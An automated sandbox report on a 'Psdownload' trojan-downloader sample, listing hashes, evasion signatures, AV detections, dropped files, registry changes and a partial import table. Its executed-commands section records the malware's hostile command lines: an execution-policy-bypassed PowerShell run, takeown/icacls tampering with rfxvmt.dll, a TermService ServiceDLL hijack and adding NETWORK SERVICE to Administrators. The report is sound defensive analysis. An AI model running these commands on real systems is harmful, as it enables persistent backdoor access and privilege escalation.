- [*] MalFamily: "Psdownload"
- [*] MalScore: 10.0
- [*] File Name: "Exes_d9c6a67478f115a18d4a1091ed69bec4.exe"
- [*] File Size: 2572376
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive"
- [*] SHA256: "f54c918db990d89caac14f8aecf465d56267300adce0abca8a5514f6e255c12d"
- [*] MD5: "d9c6a67478f115a18d4a1091ed69bec4"
- [*] SHA1: "72f325b29009cd6701202c26d7e6f71e5cf49770"
- [*] SHA512: "2cb244a8e1e97bba933b6c1993ecfa7a15a920d96f16a3a1549833536646287c8f2b7c5e03fe66ca4522161e63425ccd815ee7958fd54218c50574105a11dab0"
- [*] CRC32: "18CAE714"
- [*] SSDEEP: "49152:s02xUWRNg4aIWzh74MUArNbY/jCBBdsPgFYogBQFV+5Cn8INchQkxQKry:cxFRKTjzdUkUSsVGcIWhhry"
- [*] Process Execution: [
- "Exes_d9c6a67478f115a18d4a1091ed69bec4.exe",
- "cmd.exe",
- "wscript.exe",
- "cmd.exe",
- "powershell.exe",
- "takeown.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "icacls.exe",
- "reg.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "services.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "svchost.exe",
- "svchost.exe",
- "taskhost.exe",
- "lsm.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details": [
- {
- "process": "cmd.exe, PID 2476"
- }
- ]
- },
- {
- "Description": "Detected script timer window indicative of sleep style evasion",
- "Details": [
- {
- "Window": "WSH-Timer"
- }
- ]
- },
- {
- "Description": "A process attempted to delay the analysis task.",
- "Details": [
- {
- "Process": "WmiPrvSE.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds"
- },
- {
- "Process": "powershell.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds"
- }
- ]
- },
- {
- "Description": "Reads data out of its own binary image",
- "Details": [
- {
- "self_read": "process: Exes_d9c6a67478f115a18d4a1091ed69bec4.exe, pid: 3244, offset: 0x00000000, length: 0x00272c7f"
- },
- {
- "self_read": "process: Exes_d9c6a67478f115a18d4a1091ed69bec4.exe, pid: 3244, offset: 0x0001901c, length: 0x0014bab3"
- },
- {
- "self_read": "process: Exes_d9c6a67478f115a18d4a1091ed69bec4.exe, pid: 3244, offset: 0x00272c7f, length: 0x00000004"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x00000000, length: 0x00000040"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x000000f8, length: 0x00000018"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x00000200, length: 0x7fe00000028"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x0001f200, length: 0x00000020"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x0001f258, length: 0x00000018"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x0001f3a8, length: 0x7fe00000018"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x0001f670, length: 0x00000010"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x0001f840, length: 0x00000012"
- },
- {
- "self_read": "process: wscript.exe, pid: 3908, offset: 0x7fe00000228, length: 0x7fe00000078"
- }
- ]
- },
- {
- "Description": "A process created a hidden window",
- "Details": [
- {
- "Process": "wscript.exe -> cmd"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
- },
- {
- "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
- }
- ]
- },
- {
- "Description": "Deletes its original binary from disk",
- "Details": []
- },
- {
- "Description": "Attempts to restart the guest VM",
- "Details": []
- },
- {
- "Description": "Tries to suspend Cuckoo threads to prevent logging of malicious activity",
- "Details": [
- {
- "Process": "svchost.exe (104)"
- }
- ]
- },
- {
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details": [
- {
- "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 7117002 times"
- }
- ]
- },
- {
- "Description": "Installs itself for autorun at Windows startup",
- "Details": [
- {
- "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL"
- },
- {
- "data": "%SystemRoot%\\help\\servicedll.dll"
- }
- ]
- },
- {
- "Description": "Attempts to execute a powershell command with suspicious parameter/s",
- "Details": [
- {
- "execution_policy": "Attempts to bypass execution policy"
- }
- ]
- },
- {
- "Description": "Creates a hidden or system file",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RFf91b1e.TMP"
- }
- ]
- },
- {
- "Description": "File has been identified by 29 Antiviruses on VirusTotal as malicious",
- "Details": [
- {
- "Bkav": "HW32.Packed."
- },
- {
- "CAT-QuickHeal": "Trojandownloader.Psdownload"
- },
- {
- "McAfee": "Artemis!D9C6A67478F1"
- },
- {
- "Alibaba": "TrojanDownloader:Win32/PsDownload.98174c72"
- },
- {
- "Arcabit": "Trojan.Barys.DF047"
- },
- {
- "Symantec": "W97M.Downloader"
- },
- {
- "Paloalto": "generic.ml"
- },
- {
- "Kaspersky": "HEUR:Trojan-Downloader.Win32.PsDownload.gen"
- },
- {
- "BitDefender": "Gen:Variant.Ursu.481402"
- },
- {
- "NANO-Antivirus": "Trojan.Win32.PsDownload.frcxyy"
- },
- {
- "AegisLab": "Trojan.Win32.PsDownload.4!c"
- },
- {
- "Avast": "Win32:Malware-gen"
- },
- {
- "Sophos": "Mal/Generic-S"
- },
- {
- "F-Secure": "Trojan.TR/Dldr.PsDownload.twazw"
- },
- {
- "DrWeb": "BackDoor.HRDP.12"
- },
- {
- "Emsisoft": "Gen:Variant.Ursu.481402 (B)"
- },
- {
- "Cyren": "W32/Trojan.KODO-0437"
- },
- {
- "Avira": "TR/Dldr.PsDownload.twazw"
- },
- {
- "Microsoft": "Trojan:Win32/Tiggre!rfn"
- },
- {
- "ViRobot": "Trojan.Win32.Z.Psdownload.2572376"
- },
- {
- "ZoneAlarm": "HEUR:Trojan-Downloader.Win32.PsDownload.gen"
- },
- {
- "GData": "Gen:Variant.Barys.61511"
- },
- {
- "VBA32": "TrojanDownloader.PsDownload"
- },
- {
- "Cylance": "Unsafe"
- },
- {
- "ESET-NOD32": "a variant of Generik.HHGEYXI"
- },
- {
- "TrendMicro-HouseCall": "TROJ_GEN.R002H0CF919"
- },
- {
- "AVG": "Win32:Malware-gen"
- },
- {
- "Cybereason": "malicious.478f11"
- },
- {
- "Qihoo-360": "Win32/Trojan.ddb"
- }
- ]
- }
- ]
- [*] Started Service: [
- "TermService"
- ]
- [*] Executed Commands: [
- "\"cmd.exe\" /c wscript C:\\Users\\user\\AppData\\Local\\Temp\\runnable.vbs",
- "wscript C:\\Users\\user\\AppData\\Local\\Temp\\runnable.vbs",
- "\"C:\\Windows\\System32\\cmd.exe\" /c rename C:\\Users\\user\\AppData\\Local\\Temp\\runnable.txt runnable.ps1& powershell.exe -ep bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\runnable.ps1",
- "cmd /c rename C:\\Users\\user\\AppData\\Local\\Temp\\runnable.txt runnable.ps1& powershell.exe -ep bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\runnable.ps1",
- "powershell.exe -ep bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\runnable.ps1",
- "\"C:\\Windows\\system32\\takeown.exe\" /A /F rfxvmt.dll",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /inheritance:d",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /setowner \"NT SERVICE\\TrustedInstaller\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT SERVICE\\TrustedInstaller:F\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove \"NT AUTHORITY\\SYSTEM\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT AUTHORITY\\SYSTEM:RX\"",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove BUILTIN\\Administrators",
- "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant BUILTIN\\Administrators:RX",
- "\"C:\\Windows\\system32\\reg.exe\" add HKLM\\system\\currentcontrolset\\services\\TermService\\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\\help\\servicedll.dll /f",
- "\"C:\\Windows\\system32\\net.exe\" localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
- "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.ps1 /f",
- "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
- "C:\\Windows\\system32\\net1 localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
- "C:\\Windows\\System32\\svchost.exe -k NetworkService"
- ]
- [*] Mutexes: [
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex",
- "Global\\CLR_PerfMon_WrapMutex",
- "Global\\CLR_CASOFF_MUTEX"
- ]
- [*] Modified Files: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\log_4043.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\install_776644.log",
- "C:\\Users\\user\\AppData\\Local\\Temp\\log_986225.log",
- "C:\\Users\\user\\AppData\\Local\\Temp\\runnable.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsyBB3.tmp\\System.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\readme_88755.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\changelog_66663.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\terminal.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\changes_765543.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\runnable.vbs",
- "C:\\Users\\user\\AppData\\Local\\Temp\\runnable.ps1",
- "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
- "\\??\\PIPE\\srvsvc",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\P76M9IKTLS2SWNQ7412A.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RFf91b1e.TMP",
- "C:\\Windows\\Help\\servicedll.dll",
- "C:\\Windows\\Help\\lababa.bin",
- "C:\\Windows\\Help\\portable.dat",
- "C:\\Windows\\sysnative\\rfxvmt.dll",
- "C:\\Windows\\Temp\\desk.txt",
- "\\??\\PIPE\\samr",
- "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
- "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
- "\\??\\PIPE\\lsarpc",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8"
- ]
- [*] Deleted Files: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsdAE7.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsyBB3.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsyBB3.tmp\\System.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\nsyBB3.tmp\\",
- "C:\\Users\\user\\AppData\\Local\\Temp\\runnable.txt",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RFf91b1e.TMP",
- "C:\\Users\\user\\AppData\\Local\\Temp\\changelog_66663.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\changes_765543.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\log_4043.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\readme_88755.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\terminal.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\runnable.ps1",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_d9c6a67478f115a18d4a1091ed69bec4.exe",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.988.16337562",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.988.16337562",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.988.16337562"
- ]
- [*] Modified Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL"
- ]
- [*] Deleted Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
- ]
- [*] DNS Communications: []
- [*] Domains: []
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D HTTP/1.1\r\nCache-Control: max-age = 128165\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 11:02:13 GMT\r\nIf-None-Match: \"5c961235-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D HTTP/1.1\r\nCache-Control: max-age = 143038\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 15:00:07 GMT\r\nIf-None-Match: \"5c9649f7-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "GetTempPathA",
- "address": "0x407070"
- },
- {
- "name": "GetFileSize",
- "address": "0x407074"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x407078"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x40707c"
- },
- {
- "name": "CopyFileA",
- "address": "0x407080"
- },
- {
- "name": "ExitProcess",
- "address": "0x407084"
- },
- {
- "name": "SetEnvironmentVariableA",
- "address": "0x407088"
- },
- {
- "name": "Sleep",
- "address": "0x40708c"
- },
- {
- "name": "GetTickCount",
- "address": "0x407090"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x407094"
- },
- {
- "name": "lstrlenA",
- "address": "0x407098"
- },
- {
- "name": "GetVersion",
- "address": "0x40709c"
- },
- {
- "name": "SetErrorMode",
- "address": "0x4070a0"
- },
- {
- "name": "lstrcpynA",
- "address": "0x4070a4"
- },
- {
- "name": "GetDiskFreeSpaceA",
- "address": "0x4070a8"
- },
- {
- "name": "GlobalUnlock",
- "address": "0x4070ac"
- },
- {
- "name": "GetWindowsDirectoryA",
- "address": "0x4070b0"
- },
- {
- "name": "SetCurrentDirectoryA",
- "address": "0x4070b4"
- },
- {
- "name": "GetLastError",
- "address": "0x4070b8"
- },
- {
- "name": "CreateDirectoryA",
- "address": "0x4070bc"
- },
- {
- "name": "CreateProcessA",
- "address": "0x4070c0"
- },
- {
- "name": "RemoveDirectoryA",
- "address": "0x4070c4"
- },
- {
- "name": "CreateFileA",
- "address": "0x4070c8"
- },
- {
- "name": "GetTempFileNameA",
- "address": "0x4070cc"
- },
- {
- "name": "ReadFile",
- "address": "0x4070d0"
- },
- {
- "name": "WriteFile",
- "address": "0x4070d4"
- },
- {
- "name": "lstrcpyA",
- "address": "0x4070d8"
- },
- {
- "name": "MoveFileExA",
- "address": "0x4070dc"
- },
- {
- "name": "lstrcatA",
- "address": "0x4070e0"
- },
- {
- "name": "GetSystemDirectoryA",
- "address": "0x4070e4"
- },
- {
- "name": "GetProcAddress",
- "address": "0x4070e8"
- },
- {
- "name": "GetExitCodeProcess",
- "address": "0x4070ec"
- },
- {
- "name": "WaitForSingleObject",
- "address": "0x4070f0"
- },
- {
- "name": "CompareFileTime",
- "address": "0x4070f4"
- },
- {
- "name": "SetFileAttributesA",
- "address": "0x4070f8"
- },
- {
- "name": "GetFileAttributesA",
- "address": "0x4070fc"
- },
- {
- "name": "GetShortPathNameA",
- "address": "0x407100"
- },
- {
- "name": "MoveFileA",
- "address": "0x407104"
- },
- {
- "name": "GetFullPathNameA",
- "address": "0x407108"
- },
- {
- "name": "SetFileTime",
- "address": "0x40710c"
- },
- {
- "name": "SearchPathA",
- "address": "0x407110"
- },
- {
- "name": "CloseHandle",
- "address": "0x407114"
- },
- {
- "name": "lstrcmpiA",
- "address": "0x407118"
- },
- {
- "name": "CreateThread",
- "address": "0x40711c"
- },
- {
- "name": "GlobalLock",
- "address": "0x407120"
- },
- {
- "name": "lstrcmpA",
- "address": "0x407124"
- },
- {
- "name": "FindFirstFileA",
- "address": "0x407128"
- },
- {
- "name": "FindNextFileA",
- "address": "0x40712c"
- },
- {
- "name": "DeleteFileA",
- "address": "0x407130"
- },
- {
- "name": "SetFilePointer",
- "address": "0x407134"
- },
- {
- "name": "GetPrivateProfileStringA",
- "address": "0x407138"
- },
- {
- "name": "FindClose",
- "address": "0x40713c"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x407140"
- },
- {
- "name": "FreeLibrary",
- "address": "0x407144"
- },
- {
- "name": "MulDiv",
- "address": "0x407148"
- },
- {
- "name": "WritePrivateProfileStringA",
- "address": "0x40714c"
- },
- {
- "name": "LoadLibraryExA",
- "address": "0x407150"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x407154"
- },
- {
- "name": "GlobalAlloc",
- "address": "0x407158"
- },
- {
- "name": "GlobalFree",
- "address": "0x40715c"
- },
- {
- "name": "ExpandEnvironmentStringsA",
- "address": "0x407160"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "ScreenToClient",
- "address": "0x407184"
- },
- {
- "name": "GetSystemMenu",
- "address": "0x407188"
- },
- {
- "name": "SetClassLongA",
- "address": "0x40718c"
- },
- {
- "name": "IsWindowEnabled",
- "address": "0x407190"
- },
- {
- "name": "SetWindowPos",
- "address": "0x407194"
- },
- {
- "name": "GetSysColor",
- "address": "0x407198"
- },
- {
- "name": "GetWindowLongA",
- "address": "0x40719c"
- },
- {
- "name": "SetCursor",
- "address": "0x4071a0"
- },
- {
- "name": "LoadCursorA",
- "address": "0x4071a4"
- },
- {
- "name": "CheckDlgButton",
- "address": "0x4071a8"
- },
- {
- "name": "GetMessagePos",
- "address": "0x4071ac"
- },
- {
- "name": "LoadBitmapA",
- "address": "0x4071b0"
- },
- {
- "name": "CallWindowProcA",
- "address": "0x4071b4"
- },
- {
- "name": "IsWindowVisible",
- "address": "0x4071b8"
- },
- {
- "name": "CloseClipboard",
- "address": "0x4071bc"
- },
- {
- "name": "SetClipboardData",
- "address": "0x4071c0"
- },
- {
- "name": "EmptyClipboard",
- "address": "0x4071c4"
- },
- {
- "name": "PostQuitMessage",
- "address": "0x4071c8"
- },
- {
- "name": "GetWindowRect",
- "address": "0x4071cc"
- },
- {
- "name": "EnableMenuItem",
- "address": "0x4071d0"
- },
- {
- "name": "CreatePopupMenu",
- "address": "0x4071d4"
- },
- {
- "name": "GetSystemMetrics",
- "address": "0x4071d8"
- },
- {
- "name": "SetDlgItemTextA",
- "address": "0x4071dc"
- },
- {
- "name": "GetDlgItemTextA",
- "address": "0x4071e0"
- },
- {
- "name": "MessageBoxIndirectA",
- "address": "0x4071e4"
- },
- {
- "name": "CharPrevA",
- "address": "0x4071e8"
- },
- {
- "name": "DispatchMessageA",
- "address": "0x4071ec"
- },
- {
- "name": "PeekMessageA",
- "address": "0x4071f0"
- },
- {
- "name": "ReleaseDC",
- "address": "0x4071f4"
- },
- {
- "name": "EnableWindow",
- "address": "0x4071f8"
- },
- {
- "name": "InvalidateRect",
- "address": "0x4071fc"
- },
- {
- "name": "SendMessageA",
- "address": "0x407200"
- },
- {
- "name": "DefWindowProcA",
- "address": "0x407204"
- },
- {
- "name": "BeginPaint",
- "address": "0x407208"
- },
- {
- "name": "GetClientRect",
- "address": "0x40720c"
- },
- {
- "name": "FillRect",
- "address": "0x407210"
- },
- {
- "name": "DrawTextA",
- "address": "0x407214"
- },
- {
- "name": "EndDialog",
- "address": "0x407218"
- },
- {
- "name": "RegisterClassA",
- "address": "0x40721c"
- },
- {
- "name": "SystemParametersInfoA",
- "address": "0x407220"
- },
- {
- "name": "CreateWindowExA",
- "address": "0x407224"
- },
- {
- "name": "GetClassInfoA",
- "address": "0x407228"
- },
- {
- "name": "DialogBoxParamA",
- "address": "0x40722c"
- },
- {
- "name": "CharNextA",
- "address": "0x407230"
- },
- {
- "name": "ExitWindowsEx",
- "address": "0x407234"
- },
- {
- "name": "GetDC",
- "address": "0x407238"
- },
- {
- "name": "CreateDialogParamA",
- "address": "0x40723c"
- },
- {
- "name": "SetTimer",
- "address": "0x407240"
- },
- {
- "name": "GetDlgItem",
- "address": "0x407244"
- },
- {
- "name": "SetWindowLongA",
- "address": "0x407248"
- },
- {
- "name": "SetForegroundWindow",
- "address": "0x40724c"
- },
- {
- "name": "LoadImageA",
- "address": "0x407250"
- },
- {
- "name": "IsWindow",
- "address": "0x407254"
- },
- {
- "name": "SendMessageTimeoutA",
- "address": "0x407258"
- },
- {
- "name": "FindWindowExA",
- "address": "0x40725c"
- },
- {
- "name": "OpenClipboard",
- "address": "0x407260"
- },
- {
- "name": "TrackPopupMenu",
- "address": "0x407264"
- },
- {
- "name": "AppendMenuA",
- "address": "0x407268"
- },
- {
- "name": "EndPaint",
- "address": "0x40726c"
- },
- {
- "name": "DestroyWindow",
- "address": "0x407270"
- },
- {
- "name": "wsprintfA",
- "address": "0x407274"
- },
- {
- "name": "ShowWindow",
- "address": "0x407278"
- },
- {
- "name": "SetWindowTextA",
- "address": "0x40727c"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "SelectObject",
- "address": "0x40704c"
- },
- {
- "name": "SetBkMode",
- "address": "0x407050"
- },
- {
- "name": "CreateFontIndirectA",
- "address": "0x407054"
- },
- {
- "name": "SetTextColor",
- "address": "0x407058"
- },
- {
- "name": "DeleteObject",
- "address": "0x40705c"
- },
- {
- "name": "GetDeviceCaps",
- "address": "0x407060"
- },
- {
- "name": "CreateBrushIndirect",
- "address": "0x407064"
- },
- {
- "name": "SetBkColor",
- "address": "0x407068"
- }
- ],
- "dll": "GDI32.dll"
- },
- {
- "imports": [
- {
- "name": "SHGetSpecialFolderLocation",
- "address": "0x407168"
- },
- {
- "name": "ShellExecuteExA",
- "address": "0x40716c"
- },
- {
- "name": "SHGetPathFromIDListA",
- "address": "0x407170"
- },
- {
- "name": "SHBrowseForFolderA",
- "address": "0x407174"
- },
- {
- "name": "SHGetFileInfoA",
- "address": "0x407178"
- },
- {
- "name": "SHFileOperationA",
- "address": "0x40717c"
- }
- ],
- "dll": "SHELL32.dll"
- },
- {
- "imports": [
- {
- "name": "AdjustTokenPrivileges",
- "address": "0x407000"
- },
- {
- "name": "RegCreateKeyExA",
- "address": "0x407004"
- },
- {
- "name": "RegOpenKeyExA",
- "address": "0x407008"
- },
- {
- "name": "SetFileSecurityA",
- "address": "0x40700c"
